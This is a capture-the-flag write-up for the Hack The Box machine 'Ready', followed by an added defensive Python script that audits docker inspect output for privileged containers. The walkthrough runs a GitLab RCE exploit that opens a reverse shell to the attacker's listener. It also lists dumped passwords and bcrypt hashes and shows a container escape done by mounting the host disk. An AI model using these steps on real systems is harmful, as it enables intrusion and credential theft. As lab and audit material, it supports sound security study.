HTB - Ready
Write Up
Two open ports: 22 (SSH) and a web server on 5080. The web server hosts an instance of GitLab. Signing up works without any verification and lands me on the GitLab dashboard. There’s one public project called ready-channel, created by the user “dude”. The project repo houses a Drupal install, and the settings.php file gives up a set of MySQL credentials (drupaluser : %%cHzhNC=k9yYN!T). The GitLab version that’s running is CE 11.4.7, which is affected by an authenticated RCE vulnerability. Running the exploit:
python3 49334.py -u test1 -p password1 -g http://ready.htb -l 10.10.14.8 -P 4040
pops a reverse shell on our listener as the git user. Upgrading to a proper TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
We’re able to pick up the user flag from dude’s home folder.
Now that we’re in, we know the GitLab install keeps the dude account and its password hash in its database, so that’s our next target. /var/opt/gitlab/gitlab-rails/etc/database.yml
contains the information we need to log in to the GitLab PostgreSQL database.
psql -h /var/opt/gitlab/postgresql -p 5432 -U gitlab -d gitlabhq_production
\pset pager 0
\dt
\d+ users
SELECT username,email,encrypted_password FROM users;
After a few hours of running hashcat against the bcrypt hashes with rockyou, this probably isn’t the intended path. There is a file called root_pass containing YG65407Bjqvv9A0a8Tm_7w, but that doesn’t work at any login point. The .dockerenv file suggests we’re inside a Docker container as well. After a lot of manual searching and enumeration, I load up linpeas and it finds a password I had missed before:
/opt/backup/gitlab.rb:gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"
Testing this password with su gets us root inside the container. Now we need to escape the Docker container.
fdisk -l shows the host’s /dev/sda disk is visible from inside the container:
Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: gpt
Disk identifier: 32558524-85A4-4072-AA28-FA341BE86C2E
Device Start End Sectors Size Type
/dev/sda1 2048 4095 2048 1M BIOS boot
/dev/sda2 4096 37746687 37742592 18G Linux filesystem
/dev/sda3 37746688 41940991 4194304 2G Linux swap
After creating a directory in /mnt/, I’m able to mount sda2 and browse the host file system outside of the Docker container. The root folder contains our flag.
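The escape only works because the container can see the host’s block device and is allowed to mount it; a default, unprivileged Docker container has neither the /dev/sda node nor the CAP_SYS_ADMIN it needs for mount. Exposure like this is visible in the daemon’s own metadata, so the audit below (an added example, not part of the original write-up) parses the JSON that `docker inspect` emits and flags privileged mode, mapped host devices, dangerous added capabilities, host PID namespace sharing and bind mounts of sensitive host paths. The inspect output embedded in the script is constructed for the example; the field names (Name, HostConfig.Privileged, HostConfig.Devices, HostConfig.CapAdd, HostConfig.PidMode, Mounts) are the real keys docker inspect uses.

```python
"""Audit docker inspect output for settings that hand a container the host (added example)."""
import json
from typing import Dict, List

# Capabilities that let a process mount filesystems, touch raw devices or
# otherwise step outside the container's view of the host.
DANGEROUS_CAPS = {"ALL", "SYS_ADMIN", "SYS_RAWIO", "SYS_MODULE", "SYS_PTRACE", "DAC_READ_SEARCH"}
# Host paths whose bind mount exposes the host itself rather than application data.
SENSITIVE_HOST_PATHS = {"/", "/dev", "/proc", "/sys", "/etc", "/var/run/docker.sock", "/run/docker.sock"}
# Device node prefixes that denote whole disks or partitions.
BLOCK_DEVICE_PREFIXES = ("/dev/sd", "/dev/vd", "/dev/nvme", "/dev/xvd", "/dev/mapper/", "/dev/dm-")


def normalize_cap(cap: str) -> str:
    """docker inspect echoes CapAdd as given (SYS_ADMIN or CAP_SYS_ADMIN); compare one form."""
    cap = cap.upper()
    return cap[4:] if cap.startswith("CAP_") else cap


def audit_container(container: dict) -> List[str]:
    """Return a list of human-readable issues for one inspect record (empty if clean)."""
    hc = container.get("HostConfig") or {}
    issues: List[str] = []
    if hc.get("Privileged"):
        issues.append("privileged: every host device and all capabilities are available")
    for dev in hc.get("Devices") or []:
        host_path = dev.get("PathOnHost", "")
        if host_path.startswith(BLOCK_DEVICE_PREFIXES):
            issues.append(f"host block device mapped in: {host_path}")
        elif host_path:
            issues.append(f"host device mapped in: {host_path}")
    added = {normalize_cap(c) for c in hc.get("CapAdd") or []}
    risky = sorted(added & DANGEROUS_CAPS)
    if risky:
        issues.append("dangerous capabilities added: " + ", ".join(risky))
    if hc.get("PidMode") == "host":
        issues.append("shares the host PID namespace")
    for mount in container.get("Mounts") or []:
        source = mount.get("Source", "")
        if mount.get("Type") == "bind" and (source.rstrip("/") or "/") in SENSITIVE_HOST_PATHS:
            issues.append(f"sensitive host path bind-mounted: {source}")
    return issues


def audit_inspect_output(inspect_json: str) -> Dict[str, List[str]]:
    """Map container name -> issues, listing only containers that have any."""
    report: Dict[str, List[str]] = {}
    for container in json.loads(inspect_json):
        issues = audit_container(container)
        if issues:
            report[container.get("Name", "?").lstrip("/")] = issues
    return report


# Constructed stand-in for `docker inspect gitlab web`: one container run the
# way this box's was (privileged, host disk mapped in), one run with defaults.
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/gitlab",
        "HostConfig": {
            "Privileged": True,
            "Devices": [{"PathOnHost": "/dev/sda", "PathInContainer": "/dev/sda", "CgroupPermissions": "rwm"}],
            "CapAdd": None,
            "PidMode": "",
        },
        "Mounts": [{"Type": "bind", "Source": "/srv/gitlab/config", "Destination": "/etc/gitlab"}],
    },
    {
        "Name": "/web",
        "HostConfig": {"Privileged": False, "Devices": [], "CapAdd": None, "PidMode": ""},
        "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/web/_data", "Destination": "/data"}],
    },
])

if __name__ == "__main__":
    for name, issues in audit_inspect_output(SAMPLE_INSPECT).items():
        print(name)
        for issue in issues:
            print("  -", issue)
```

On a real host, feed it `docker inspect $(docker ps -q)`; any container that shows up in the report can reach the host’s disks or processes the same way this box’s GitLab container could, and the fix is to drop --privileged / --device / --cap-add and bind-mount only the data directories the service actually needs.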
Recon
Initial Scan:
nmap -sV $READY
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
5080/tcp open http nginx
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Script/version scan:
nmap -sC -sV -p22,5080 10.10.10.220
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open http nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://ready.htb:5080/users/sign_in
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
WFuzz:
wfuzz -c -u http://ready.htb:5080/FUZZ/ -w /usr/share/wordlists/dirb/common.txt --hc 404,401,302
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001575: 301 0 L 5 W 171 Ch "favicon.ico"
000001536: 200 244 L 779 W 13035 Ch "explore"
000001886: 200 229 L 2389 W 37655 Ch "help"
000003207: 200 245 L 785 W 13114 Ch "public"
000003436: 200 72 L 207 W 2095 Ch "robots.txt"
000003441: 200 299 L 938 W 15493 Ch "root"
000003525: 200 200 L 731 W 12392 Ch "search"
000004008: 200 299 L 938 W 15452 Ch "test"
000004010: 200 299 L 938 W 15475 Ch "test1"
Credentials
MySQL:
http://ready.htb:5080/dude/ready-channel/blob/master/sites/default/settings.php
'database' => 'drupal',
'username' => 'drupaluser',
'password' => '%%cHzhNC=k9yYN!T',
'host' => 'localhost',
PostgreSQL:
/var/opt/gitlab/gitlab-rails/etc/database.yml
database: gitlabhq_production
pool: 10
username: "gitlab"
password:
host: "/var/opt/gitlab/postgresql"
port: 5432
GitLab:
username | email | encrypted_password
----------------------------------+-------------------------------------------+--------------------------------------------------------------
root | admin@example.com | $2a$10$.Kc4bwq3BqLCEzAGJVIJFeK4emNnucvAqk1vCv4Yp45yy2nmrFa.2
test1 | test1@test.test | $2a$10$3UWZ0vuKf/AHOjphoObmRO4Y2fACSFmdeRmU5iKUT/TNyDgWltJba
mitroglou | mitroglou@ready.com | $2a$10$4vZAglOnEdNEe1SoNj1IE.RfotOt9gPnOXBEihjd7QBhsUmgmAdLi
dude | dude@ready.com | $2a$10$NOMTXhO31vqykicMa6zj3O.F5PIyI9q/S4c.v22eMSfXNDdtpI2Mm
test | test@test.gr | $2a$10$7xK1UPcwvjWIo4ioCz28GeFSt.NR00AHsY2AF.gWzaWwikRVXCTXa
eb8a31bc5f2e4f8284c5a18b115cef77 | eb8a31bc5f2e4f8284c5a18b115cef77@mail.htb | $2a$10$.aOidQ2aprnoXvfDNyNfGOuMLqcLkPljHsPeV8j7BZA4GU.5p1ZXm
Host:
git:
Misc:
/opt/backup/gitlab.rb:gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"
Notes
- GitLab Community Edition 11.4.7
- /var/opt/gitlab/gitlab-rails/etc/secrets.yml